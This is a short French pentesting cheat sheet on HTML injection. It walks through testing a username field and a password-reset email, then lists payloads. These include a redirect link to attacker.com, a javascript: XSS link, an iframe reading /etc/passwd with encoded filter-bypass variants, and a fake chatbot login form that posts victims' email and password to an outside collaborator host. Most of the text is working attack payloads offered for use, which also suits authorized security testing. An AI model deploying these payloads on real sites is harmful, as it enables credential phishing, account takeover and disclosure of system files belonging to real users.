Basic

• Créer un compte

• Changer nom d'utilisateur en "abc><h1>attacker<h1>

• Regarder si l'injection est reflété sur la page dans l'emplacement de votre nom d'utilisateur.

• Faire une demande de mot de passe oublié et regarder si la balise <h1> a été exécutée dans le mail.

• Si cela fonctionne, essayer d'envoyer un lien de redirection (<h1>attacker<h1><a href="https://attacker.com/">Clic here</a>)

HTML injection to XSS

<a href="javascript:alert(document.domain)">exemple.com</a>

HTML injection to LFI

<iframe src=file:///etc/passwd></iframe>

Contournement de filtre

file:/etc/passwd%3F/
file:/etc%252passwd/
file:/etc%252passwd%3F/
file:///etc/%3F/../passwd
file:${br}/et${u}c%252pas${te}swd%3F/
file:$(br)/et$(u)c%252pas$(te)swd%3F/

HTML-injection to Account takeover

Exemple de fausse page de connexion dans un contexte de champs de commentaire ou on se fait passer pour un chatbot

<h1>Connectez vous pour commencer à chatter</h1>
<form action="https://yourburp.collab.com" method="post">
<label for="email">Adresse e-mail:</label>
<input name="email">
<label for="password">Mot de Passe:</label>
<input type="password" name="password">
<input type="submit" value="Connexion"></form><!--